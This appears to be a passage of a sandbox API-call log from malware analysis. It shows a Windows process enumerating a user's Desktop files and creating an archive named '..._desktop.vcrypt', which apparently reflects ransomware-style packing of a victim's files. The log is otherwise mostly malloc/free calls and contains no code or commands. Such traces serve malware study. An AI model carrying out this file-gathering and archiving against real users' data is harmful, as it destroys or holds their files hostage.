malloc (_Size=0x8) returned 0x1c80a70 [0058.097] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x294ff160, ftCreationTime.dwHighDateTime=0x1d5e2e9, ftLastAccessTime.dwLowDateTime=0x7693c150, ftLastAccessTime.dwHighDateTime=0x1d5e64e, ftLastWriteTime.dwLowDateTime=0x7693c150, ftLastWriteTime.dwHighDateTime=0x1d5e64e, nFileSizeHigh=0x0, nFileSizeLow=0x129b0, dwReserved0=0x77c7387a, dwReserved1=0x77f70c69, cFileName="bQZSK5g-r9Y.m4a", cAlternateFileName="BQZSK5~1.M4A")) returned 1 [0058.097] malloc (_Size=0x20) returned 0x1c82b10 [0058.097] free (_Block=0x1c80a70) [0058.097] malloc (_Size=0x20) returned 0x1c82b38 [0058.097] malloc (_Size=0x8) returned 0x1c80a70 [0058.097] malloc (_Size=0xc) returned 0x27f640 [0058.097] malloc (_Size=0x14) returned 0x1c80600 [0058.097] malloc (_Size=0xc) returned 0x27f5b0 [0058.097] malloc (_Size=0x10) returned 0x27f598 [0058.097] malloc (_Size=0xc) returned 0x27f4d8 [0058.097] malloc (_Size=0x20) returned 0x1c82b60 [0058.097] malloc (_Size=0xc) returned 0x27f628 [0058.097] free (_Block=0x1c80a70) [0058.097] malloc (_Size=0xc) returned 0x1c83310 [0058.097] malloc (_Size=0xc) returned 0x1c83328 [0058.097] malloc (_Size=0x14) returned 0x1c80620 [0058.097] malloc (_Size=0xc) returned 0x1c83340 [0058.097] malloc (_Size=0x10) returned 0x1c83358 [0058.097] malloc (_Size=0xc) returned 0x1c83370 [0058.098] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fbdfa40, ftCreationTime.dwHighDateTime=0x1d5e3ad, ftLastAccessTime.dwLowDateTime=0xc60ca300, ftLastAccessTime.dwHighDateTime=0x1d5de29, ftLastWriteTime.dwLowDateTime=0xc60ca300, ftLastWriteTime.dwHighDateTime=0x1d5de29, nFileSizeHigh=0x0, nFileSizeLow=0x6ab1, dwReserved0=0x1c83860, dwReserved1=0x270150, cFileName="uP-NbOmTzAJhw.mp4", cAlternateFileName="UP-NBO~1.MP4")) returned 1 [0058.098] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef0420, ftCreationTime.dwHighDateTime=0x1d5dc1b, ftLastAccessTime.dwLowDateTime=0xbcec6f00, ftLastAccessTime.dwHighDateTime=0x1d5e098, ftLastWriteTime.dwLowDateTime=0xbcec6f00, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0x0, nFileSizeLow=0x16291, dwReserved0=0x77c7387a, dwReserved1=0x77f70c69, cFileName="yMkqzqM.ots", cAlternateFileName="")) returned 1 [0058.098] FindNextFileW (in: hFindFile=0x477bb8, lpFindFileData=0x22eb88 | out: lpFindFileData=0x22eb88*(dwFileAttributes=0x77c6e36c, ftCreationTime.dwLowDateTime=0x77f70ce9, ftCreationTime.dwHighDateTime=0xb, ftLastAccessTime.dwLowDateTime=0x2701a4, ftLastAccessTime.dwHighDateTime=0x270000, ftLastWriteTime.dwLowDateTime=0xbcec6f00, ftLastWriteTime.dwHighDateTime=0x1d5e098, nFileSizeHigh=0xce000c, nFileSizeLow=0x5e, dwReserved0=0x77c7387a, dwReserved1=0x77f70c69, cFileName="yMkq\rÊ^", cAlternateFileName="")) returned 0 [0058.098] GetLastError () returned 0x12 [0058.098] free (_Block=0x1c80a70) [0058.098] free (_Block=0x1c836f8) [0058.098] FindClose (in: hFindFile=0x477bb8 | out: hFindFile=0x477bb8) returned 1 [0058.098] free (_Block=0x1c82898) [0058.098] free (_Block=0x1c80380) [0058.098] free (_Block=0x27f5f8) [0058.098] free (_Block=0x27f5e0) [0058.098] free (_Block=0x1c80360) [0058.098] free (_Block=0x27f5c8) [0058.098] free (_Block=0x1c80be0) [0058.098] free (_Block=0x27f580) [0058.098] free (_Block=0x27f568) [0058.099] FindNextFileW (in: hFindFile=0x477b78, lpFindFileData=0x22ed48 | out: lpFindFileData=0x22ed48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x460150, ftCreationTime.dwHighDateTime=0x1c83860, ftLastAccessTime.dwLowDateTime=0x77c6e36c, ftLastAccessTime.dwHighDateTime=0x477bb8, ftLastWriteTime.dwLowDateTime=0x475660, ftLastWriteTime.dwHighDateTime=0x22ed6c, nFileSizeHigh=0x19, nFileSizeLow=0x0, dwReserved0=0x270000, dwReserved1=0x1c82890, cFileName="", cAlternateFileName="")) returned 0 [0058.099] GetLastError () returned 0x12 [0058.099] free (_Block=0x1c80be0) [0058.099] free (_Block=0x1c826f8) [0058.099] FindClose (in: hFindFile=0x477b78 | out: hFindFile=0x477b78) returned 1 [0058.099] free (_Block=0x1c812f0) [0058.099] free (_Block=0x1c80220) [0058.099] free (_Block=0x1c801c0) [0058.099] free (_Block=0x27f400) [0058.099] free (_Block=0x1c80ae0) [0058.099] free (_Block=0x1c800c0) [0058.099] free (_Block=0x1c80280) [0058.099] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa03ee070, ftCreationTime.dwHighDateTime=0x1d5d91a, ftLastAccessTime.dwLowDateTime=0xd7c41440, ftLastAccessTime.dwHighDateTime=0x1d5ddd2, ftLastWriteTime.dwLowDateTime=0xd7c41440, ftLastWriteTime.dwHighDateTime=0x1d5ddd2, nFileSizeHigh=0x0, nFileSizeLow=0x9e5f, dwReserved0=0x270000, dwReserved1=0x1c812e8, cFileName="n8BHx-R0jAFi.mkv", cAlternateFileName="N8BHX-~1.MKV")) returned 1 [0058.099] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a2e9240, ftCreationTime.dwHighDateTime=0x1d5e74e, ftLastAccessTime.dwLowDateTime=0x135d9360, ftLastAccessTime.dwHighDateTime=0x1d5e5a2, ftLastWriteTime.dwLowDateTime=0x135d9360, ftLastWriteTime.dwHighDateTime=0x1d5e5a2, nFileSizeHigh=0x0, nFileSizeLow=0x1268a, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="nF mzbmLsvv0e1OlZm.gif", cAlternateFileName="NFMZBM~1.GIF")) returned 1 [0058.099] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2f75900, ftCreationTime.dwHighDateTime=0x1d5df28, ftLastAccessTime.dwLowDateTime=0x87c78630, ftLastAccessTime.dwHighDateTime=0x1d5dc8c, ftLastWriteTime.dwLowDateTime=0x87c78630, ftLastWriteTime.dwHighDateTime=0x1d5dc8c, nFileSizeHigh=0x0, nFileSizeLow=0x578c, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="q8JQsFRXk.mp4", cAlternateFileName="Q8JQSF~1.MP4")) returned 1 [0058.099] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6e67780, ftCreationTime.dwHighDateTime=0x1d5e5e6, ftLastAccessTime.dwLowDateTime=0xe2ee22d0, ftLastAccessTime.dwHighDateTime=0x1d5dda4, ftLastWriteTime.dwLowDateTime=0xe2ee22d0, ftLastWriteTime.dwHighDateTime=0x1d5dda4, nFileSizeHigh=0x0, nFileSizeLow=0xffd0, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="RlpYGAIBP9RiAuiDEA1C.bmp", cAlternateFileName="RLPYGA~1.BMP")) returned 1 [0058.100] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe800af80, ftCreationTime.dwHighDateTime=0x1d623ff, ftLastAccessTime.dwLowDateTime=0xe8994600, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0x23e34700, ftLastWriteTime.dwHighDateTime=0x1d623f7, nFileSizeHigh=0x0, nFileSizeLow=0xc20b1, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="video_driver.exe", cAlternateFileName="VIDEO_~1.EXE")) returned 1 [0058.100] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd311a320, ftCreationTime.dwHighDateTime=0x1d5e38d, ftLastAccessTime.dwLowDateTime=0xb17b4920, ftLastAccessTime.dwHighDateTime=0x1d5e2e6, ftLastWriteTime.dwLowDateTime=0xb17b4920, ftLastWriteTime.dwHighDateTime=0x1d5e2e6, nFileSizeHigh=0x0, nFileSizeLow=0xeac7, dwReserved0=0x77c7387a, dwReserved1=0x77f710e9, cFileName="vvdZxZXGy537svJ.mp4", cAlternateFileName="VVDZXZ~1.MP4")) returned 1 [0058.100] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89458a70, ftCreationTime.dwHighDateTime=0x1d5dddb, ftLastAccessTime.dwLowDateTime=0x3cf27a90, ftLastAccessTime.dwHighDateTime=0x1d5d7ee, ftLastWriteTime.dwLowDateTime=0x3cf27a90, ftLastWriteTime.dwHighDateTime=0x1d5d7ee, nFileSizeHigh=0x0, nFileSizeLow=0xb18e, dwReserved0=0x2700c4, dwReserved1=0x272d70, cFileName="Yt6rrVQUgdZ1oPy.gif", cAlternateFileName="YT6RRV~1.GIF")) returned 1 [0058.100] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c15a470, ftCreationTime.dwHighDateTime=0x1d5db98, ftLastAccessTime.dwLowDateTime=0x57237f40, ftLastAccessTime.dwHighDateTime=0x1d5e04f, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x0, nFileSizeLow=0x112c4, dwReserved0=0x2700c4, dwReserved1=0x272d70, cFileName="ZToX37-PbNpvd.pps", cAlternateFileName="ZTOX37~1.PPS")) returned 1 [0058.100] FindNextFileW (in: hFindFile=0x477b38, lpFindFileData=0x22ef08 | out: lpFindFileData=0x22ef08*(dwFileAttributes=0x77c6e36c, ftCreationTime.dwLowDateTime=0x77f70f69, ftCreationTime.dwHighDateTime=0x11, ftLastAccessTime.dwLowDateTime=0x2701b4, ftLastAccessTime.dwHighDateTime=0x270000, ftLastWriteTime.dwLowDateTime=0x57237f40, ftLastWriteTime.dwHighDateTime=0x1d5e04f, nFileSizeHigh=0x2c000d, nFileSizeLow=0x2e, dwReserved0=0x2700c4, dwReserved1=0x272d70, cFileName="ZToX\x0e&.", cAlternateFileName="")) returned 0 [0058.100] GetLastError () returned 0x12 [0058.100] free (_Block=0x1c80ae0) [0058.100] free (_Block=0x1c810a0) [0058.100] FindClose (in: hFindFile=0x477b38 | out: hFindFile=0x477b38) returned 1 [0058.100] free (_Block=0x0) [0058.100] fputs (in: _Str="\r \r", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.103] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.103] fputs (in: _Str="4 folders, 36 files, 2787806 bytes (2723 KiB)", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.104] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.105] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.106] free (_Block=0x1c80e20) [0058.106] malloc (_Size=0x8) returned 0x1c80ae0 [0058.106] malloc (_Size=0x4e) returned 0x1c82068 [0058.106] malloc (_Size=0x80) returned 0x1c810a0 [0058.106] free (_Block=0x1c82068) [0058.106] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.", lpFindFileData=0x22efe0 | out: lpFindFileData=0x22efe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x22f024, dwReserved1=0x477b78, cFileName="Desktop", cAlternateFileName="")) returned 0x477b38 [0058.107] malloc (_Size=0x10) returned 0x27f400 [0058.107] free (_Block=0x1c80ae0) [0058.107] FindClose (in: hFindFile=0x477b38 | out: hFindFile=0x477b38) returned 1 [0058.107] free (_Block=0x1c810a0) [0058.107] free (_Block=0x27f400) [0058.107] malloc (_Size=0x8) returned 0x1c80ae0 [0058.107] malloc (_Size=0x8) returned 0x1c80be0 [0058.107] malloc (_Size=0x84) returned 0x1c836f8 [0058.107] free (_Block=0x27d770) [0058.107] malloc (_Size=0x3e) returned 0x1c80e20 [0058.107] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x22ef8c | out: lpFindFileData=0x22ef8c*(dwFileAttributes=0x22f23c, ftCreationTime.dwLowDateTime=0x76fb8cd5, ftCreationTime.dwHighDateTime=0x55bd7748, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x76f998da, ftLastWriteTime.dwLowDateTime=0x351ca4, ftLastWriteTime.dwHighDateTime=0x1c80ae0, nFileSizeHigh=0x352dbd, nFileSizeLow=0x1c80ae0, dwReserved0=0x10, dwReserved1=0x22f00c, cFileName="\"", cAlternateFileName="㊱\x13￾￿矆矆ፄ'\x08")) returned 0xffffffff [0058.107] malloc (_Size=0x8) returned 0x27d780 [0058.107] malloc (_Size=0x84) returned 0x1c83788 [0058.107] malloc (_Size=0x7e) returned 0x1c810a0 [0058.107] malloc (_Size=0x20) returned 0x1c82b10 [0058.107] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpFindFileData=0x22ef8c | out: lpFindFileData=0x22ef8c*(dwFileAttributes=0x22f23c, ftCreationTime.dwLowDateTime=0x76fb8cd5, ftCreationTime.dwHighDateTime=0x55bd7748, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x76f998da, ftLastWriteTime.dwLowDateTime=0x351ca4, ftLastWriteTime.dwHighDateTime=0x1c80ae0, nFileSizeHigh=0x352dbd, nFileSizeLow=0x1c80ae0, dwReserved0=0x10, dwReserved1=0x22f00c, cFileName="\"", cAlternateFileName="㊱\x13￾￿矆矆ፄ'\x08")) returned 0xffffffff [0058.108] fputs (in: _Str="Creating archive: ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.108] malloc (_Size=0x84) returned 0x1c83818 [0058.108] malloc (_Size=0x4) returned 0x27d790 [0058.108] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0058.108] malloc (_Size=0x42) returned 0x1c82aa0 [0058.108] fputs (in: _Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0058.109] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.110] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0058.110] malloc (_Size=0x210) returned 0x1c83818 [0058.110] GetCurrentProcess () returned 0xffffffff [0058.110] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x22f05c, lpSystemAffinityMask=0x22f060 | out: lpProcessAffinityMask=0x22f05c, lpSystemAffinityMask=0x22f060) returned 1 [0058.111] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0058.111] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatusEx") returned 0x76d6d4c4 [0058.111] GlobalMemoryStatusEx (in: lpBuffer=0x22f004 | out: lpBuffer=0x22f004) returned 1 [0058.111] malloc (_Size=0x4) returned 0x27d790 [0058.111] malloc (_Size=0x8) returned 0x27d780 [0058.111] malloc (_Size=0x8) returned 0x27d770 [0058.111] free (_Block=0x0) [0058.111] malloc (_Size=0xa0) returned 0x1c83a30 [0058.111] malloc (_Size=0x8) returned 0x27d7b0 [0058.111] malloc (_Size=0x22) returned 0x1c83310 [0058.111] free (_Block=0x27d7b0) [0058.111] malloc (_Size=0x22) returned 0x1c83370 [0058.112] free (_Block=0x1c83310) [0058.112] malloc (_Size=0xc) returned 0x27f400 [0058.112] malloc (_Size=0x22) returned 0x1c83310 [0058.112] free (_Block=0x1c83370) [0058.112] malloc (_Size=0x8) returned 0x27d7b0 [0058.112] malloc (_Size=0x24) returned 0x1c83370 [0058.112] free (_Block=0x27d7b0) [0058.112] malloc (_Size=0x24) returned 0x1c833a0 [0058.112] free (_Block=0x1c83370) [0058.112] malloc (_Size=0xc) returned 0x27f568 [0058.112] malloc (_Size=0x24) returned 0x1c83370 [0058.112] free (_Block=0x1c833a0) [0058.112] malloc (_Size=0x8) returned 0x27d7b0 [0058.112] malloc (_Size=0x18) returned 0x1c80580 [0058.112] free (_Block=0x27d7b0) [0058.112] malloc (_Size=0x18) returned 0x1c800c0 [0058.112] free (_Block=0x1c80580) [0058.112] malloc (_Size=0xc) returned 0x27f580 [0058.112] malloc (_Size=0x18) returned 0x1c80580 [0058.112] free (_Block=0x1c800c0) [0058.112] malloc (_Size=0x8) returned 0x27d7b0 [0058.112] malloc (_Size=0x12) returned 0x1c800c0 [0058.112] free (_Block=0x27d7b0) [0058.112] malloc (_Size=0x12) returned 0x1c801c0 [0058.112] free (_Block=0x1c800c0) [0058.112] malloc (_Size=0xc) returned 0x27f5c8 [0058.112] malloc (_Size=0x12) returned 0x1c800c0 [0058.113] free (_Block=0x1c801c0) [0058.113] malloc (_Size=0x8) returned 0x27d7b0 [0058.113] malloc (_Size=0x18) returned 0x1c801c0 [0058.113] free (_Block=0x27d7b0) [0058.113] malloc (_Size=0x18) returned 0x1c80220 [0058.113] free (_Block=0x1c801c0) [0058.113] malloc (_Size=0xc) returned 0x27f5e0 [0058.113] malloc (_Size=0x18) returned 0x1c801c0 [0058.113] free (_Block=0x1c80220) [0058.113] malloc (_Size=0x8) returned 0x27d7b0 [0058.113] malloc (_Size=0x2a) returned 0x1c82a30 [0058.113] free (_Block=0x27d7b0) [0058.113] malloc (_Size=0x2a) returned 0x1c812f0 [0058.113] free (_Block=0x1c82a30) [0058.113] malloc (_Size=0xc) returned 0x27f5f8 [0058.113] malloc (_Size=0x2a) returned 0x1c82a30 [0058.113] free (_Block=0x1c812f0) [0058.113] malloc (_Size=0x8) returned 0x27d7b0 [0058.113] malloc (_Size=0x2c) returned 0x1c812f0 [0058.113] free (_Block=0x27d7b0) [0058.113] malloc (_Size=0x2c) returned 0x1c82aa0 [0058.113] free (_Block=0x1c812f0) [0058.113] malloc (_Size=0xc) returned 0x27f598 [0058.113] malloc (_Size=0x2c) returned 0x1c812f0 [0058.113] free (_Block=0x1c82aa0) [0058.113] malloc (_Size=0x8) returned 0x27d7b0 [0058.113] malloc (_Size=0x2a) returned 0x1c82aa0 [0058.114] free (_Block=0x27d7b0) [0058.114] malloc (_Size=0x2a) returned 0x1c810a0 [0058.114] free (_Block=0x1c82aa0) [0058.114] malloc (_Size=0xc) returned 0x27f4d8 [0058.114] malloc (_Size=0x2a) returned 0x1c810d8 [0058.114] free (_Block=0x1c810a0) [0058.114] malloc (_Size=0x8) returned 0x27d7b0 [0058.114] malloc (_Size=0x14) returned 0x1c80220 [0058.114] free (_Block=0x27d7b0) [0058.114] malloc (_Size=0x14) returned 0x1c80360 [0058.114] free (_Block=0x1c80220) [0058.114] malloc (_Size=0xc) returned 0x27f628 [0058.114] malloc (_Size=0x14) returned 0x1c80220 [0058.114] free (_Block=0x1c80360) [0058.114] malloc (_Size=0x8) returned 0x27d7b0 [0058.114] malloc (_Size=0x16) returned 0x1c80360 [0058.114] free (_Block=0x27d7b0) [0058.114] malloc (_Size=0x16) returned 0x1c80380 [0058.114] free (_Block=0x1c80360) [0058.114] malloc (_Size=0xc) returned 0x27f640 [0058.114] malloc (_Size=0x16) returned 0x1c80360 [0058.114] free (_Block=0x1c80380) [0058.114] malloc (_Size=0x8) returned 0x27d7b0 [0058.114] malloc (_Size=0x1e) returned 0x1c82b10 [0058.114] free (_Block=0x27d7b0) [0058.114] malloc (_Size=0x1e) returned 0x1c82b38 [0058.114] free (_Block=0x1c82b10) [0058.114] malloc (_Size=0xc) returned 0x27f5b0 [0058.115] malloc (_Size=0x1e) returned 0x1c82b10 [0058.115] free (_Block=0x1c82b38) [0058.115] malloc (_Size=0x8) returned 0x27d7b0 [0058.115] malloc (_Size=0x1c) returned 0x1c82b38 [0058.115] free (_Block=0x27d7b0) [0058.115] malloc (_Size=0x1c) returned 0x1c82b60 [0058.115] free (_Block=0x1c82b38) [0058.115] malloc (_Size=0xc) returned 0x1c83af0 [0058.115] malloc (_Size=0x1c) returned 0x1c82b38 [0058.115] free (_Block=0x1c82b60) [0058.115] malloc (_Size=0x8) returned 0x27d7b0 [0058.115] malloc (_Size=0x26) returned 0x1c833a0 [0058.115] free (_Block=0x27d7b0) [0058.115] malloc (_Size=0x26) returned 0x1c833d0 [0058.115] free (_Block=0x1c833a0) [0058.115] malloc (_Size=0xc) returned 0x1c83b08 [0058.115] malloc (_Size=0x26) returned 0x1c833a0 [0058.115] free (_Block=0x1c833d0) [0058.115] malloc (_Size=0x8) returned 0x27d7b0 [0058.115] malloc (_Size=0x22) returned 0x1c833d0 [0058.115] free (_Block=0x27d7b0) [0058.115] malloc (_Size=0x22) returned 0x1c83460 [0058.115] free (_Block=0x1c833d0) [0058.115] malloc (_Size=0xc) returned 0x1c83b20 [0058.115] malloc (_Size=0x22) returned 0x1c833d0 [0058.115] free (_Block=0x1c83460) [0058.116] malloc (_Size=0x8) returned 0x27d7b0 [0058.116] malloc (_Size=0x3e) returned 0x1c82aa0 [0058.116] free (_Block=0x27d7b0) [0058.116] malloc (_Size=0x3e) returned 0x1c82898 [0058.116] free (_Block=0x1c82aa0) [0058.116] malloc (_Size=0xc) returned 0x1c83b38 [0058.116] malloc (_Size=0x3e) returned 0x1c82aa0 [0058.116] free (_Block=0x1c82898) [0058.116] malloc (_Size=0x8) returned 0x27d7b0 [0058.116] malloc (_Size=0x38) returned 0x1c82898 [0058.116] free (_Block=0x27d7b0) [0058.116] malloc (_Size=0x38) returned 0x1c828d8 [0058.116] free (_Block=0x1c82898) [0058.116] malloc (_Size=0xc) returned 0x1c83b50 [0058.116] malloc (_Size=0x38) returned 0x1c82898 [0058.116] free (_Block=0x1c828d8) [0058.116] malloc (_Size=0x8) returned 0x27d7b0 [0058.116] malloc (_Size=0x3e) returned 0x1c828d8 [0058.116] free (_Block=0x27d7b0) [0058.116] malloc (_Size=0x3e) returned 0x1c83ed8 [0058.116] free (_Block=0x1c828d8) [0058.116] malloc (_Size=0xc) returned 0x1c83b68 [0058.116] malloc (_Size=0x3e) returned 0x1c828d8 [0058.116] free (_Block=0x1c83ed8) [0058.116] malloc (_Size=0x8) returned 0x27d7b0 [0058.116] malloc (_Size=0x40) returned 0x1c83ed8 [0058.117] free (_Block=0x27d7b0) [0058.117] malloc (_Size=0x40) returned 0x1c83f20 [0058.117] free (_Block=0x1c83ed8) [0058.117] malloc (_Size=0xc) returned 0x1c83b80 [0058.117] malloc (_Size=0x40) returned 0x1c83ed8 [0058.117] free (_Block=0x1c83f20) [0058.117] malloc (_Size=0x8) returned 0x27d7b0 [0058.117] malloc (_Size=0x14) returned 0x1c80380 [0058.117] free (_Block=0x27d7b0) [0058.117] malloc (_Size=0x14) returned 0x1c80600 [0058.117] free (_Block=0x1c80380) [0058.117] malloc (_Size=0xc) returned 0x1c83b98 [0058.117] malloc (_Size=0x14) returned 0x1c80380 [0058.117] free (_Block=0x1c80600) [0058.117] malloc (_Size=0x8) returned 0x27d7b0 [0058.117] malloc (_Size=0x40) returned 0x1c83f20 [0058.117] free (_Block=0x27d7b0) [0058.117] malloc (_Size=0x40) returned 0x1c83f68 [0058.117] free (_Block=0x1c83f20) [0058.117] malloc (_Size=0xc) returned 0x1c83bb0 [0058.117] malloc (_Size=0x40) returned 0x1c83fc8 [0058.118] free (_Block=0x1c83f68) [0058.118] malloc (_Size=0x8) returned 0x27d7b0 [0058.118] malloc (_Size=0x2e) returned 0x1c84fb0 [0058.118] free (_Block=0x27d7b0) [0058.118] malloc (_Size=0x2e) returned 0x1c810a0 [0058.118] free (_Block=0x1c84fb0) [0058.118] malloc (_Size=0xc) returned 0x1c83bc8 [0058.118] malloc (_Size=0x2e) returned 0x1c84fb0 [0058.118] free (_Block=0x1c810a0) [0058.118] malloc (_Size=0x8) returned 0x27d7b0 [0058.118] malloc (_Size=0x30) returned 0x1c810a0 [0058.118] free (_Block=0x27d7b0) [0058.118] malloc (_Size=0x30) returned 0x1c83f20 [0058.118] free (_Block=0x1c810a0) [0058.118] malloc (_Size=0xc) returned 0x1c83be0 [0058.118] malloc (_Size=0x30) returned 0x1c810a0 [0058.118] free (_Block=0x1c83f20) [0058.118] malloc (_Size=0x8) returned 0x27d7b0 [0058.118] malloc (_Size=0x56) returned 0x1c83f20 [0058.118] free (_Block=0x27d7b0) [0058.118] malloc (_Size=0x56) returned 0x1c84fe8 [0058.119] free (_Block=0x1c83f20) [0058.119] malloc (_Size=0xc) returned 0x1c83bf8 [0058.119] malloc (_Size=0x56) returned 0x1c83f20 [0058.119] free (_Block=0x1c84fe8) [0058.119] malloc (_Size=0x8) returned 0x27d7b0 [0058.119] malloc (_Size=0x4c) returned 0x1c82068 [0058.119] free (_Block=0x27d7b0) [0058.119] malloc (_Size=0x4c) returned 0x1c820c0 [0058.119] free (_Block=0x1c82068) [0058.119] malloc (_Size=0xc) returned 0x1c83c10 [0058.119] malloc (_Size=0x4c) returned 0x1c82068 [0058.119] free (_Block=0x1c820c0) [0058.119] malloc (_Size=0x8) returned 0x27d7b0 [0058.119] malloc (_Size=0x44) returned 0x1c84fe8 [0058.119] free (_Block=0x27d7b0) [0058.119] malloc (_Size=0x44) returned 0x1c85038 [0058.119] free (_Block=0x1c84fe8) [0058.119] malloc (_Size=0xc) returned 0x1c83c28 [0058.119] malloc (_Size=0x44) returned 0x1c84fe8 [0058.119] free (_Block=0x1c85038) [0058.119] malloc (_Size=0x8) returned 0x27d7b0 [0058.119] malloc (_Size=0x3a) returned 0x1c84010 [0058.119] free (_Block=0x27d7b0) [0058.119] malloc (_Size=0x3a) returned 0x1c84058 [0058.154] free (_Block=0x1c84010) [0058.154] malloc (_Size=0xc) returned 0x1c83c40 [0058.154] malloc (_Size=0x3a) returned 0x1c84010 [0058.154] free (_Block=0x1c84058) [0058.155] malloc (_Size=0x8) returned 0x27d7b0 [0058.155] malloc (_Size=0x34) returned 0x1c85038 [0058.155] free (_Block=0x27d7b0) [0058.155] malloc (_Size=0x34) returned 0x1c85078 [0058.155] free (_Block=0x1c85038) [0058.155] malloc (_Size=0xc) returned 0x1c83c58 [0058.155] malloc (_Size=0x34) returned 0x1c85038 [0058.155] free (_Block=0x1c85078) [0058.155] malloc (_Size=0x8) returned 0x27d7b0 [0058.155] malloc (_Size=0x24) returned 0x1c83460 [0058.155] free (_Block=0x27d7b0) [0058.155] malloc (_Size=0x24) returned 0x1c83490 [0058.155] free (_Block=0x1c83460) [0058.155] malloc (_Size=0xc) returned 0x1c83c70 [0058.155] malloc (_Size=0x24) returned 0x1c83460 [0058.155] free (_Block=0x1c83490) [0058.155] malloc (_Size=0x8) returned 0x27d7b0 [0058.155] malloc (_Size=0x54) returned 0x1c85078 [0058.155] free (_Block=0x27d7b0) [0058.155] malloc (_Size=0x54) returned 0x1c850d8 [0058.155] free (_Block=0x1c85078) [0058.155] malloc (_Size=0xc) returned 0x1c83c88 [0058.155] malloc (_Size=0x54) returned 0x1c85078 [0058.155] free (_Block=0x1c850d8) [0058.156] malloc (_Size=0x8) returned 0x27d7b0 [0058.156] malloc (_Size=0x44) returned 0x1c850d8 [0058.156] free (_Block=0x27d7b0) [0058.156] malloc (_Size=0x44) returned 0x1c85128 [0058.156] free (_Block=0x1c850d8) [0058.156] malloc (_Size=0xc) returned 0x1c83ca0 [0058.156] malloc (_Size=0x44) returned 0x1c850d8 [0058.156] free (_Block=0x1c85128) [0058.156] malloc (_Size=0x8) returned 0x27d7b0 [0058.156] malloc (_Size=0x48) returned 0x1c85128 [0058.156] free (_Block=0x27d7b0) [0058.156] malloc (_Size=0x48) returned 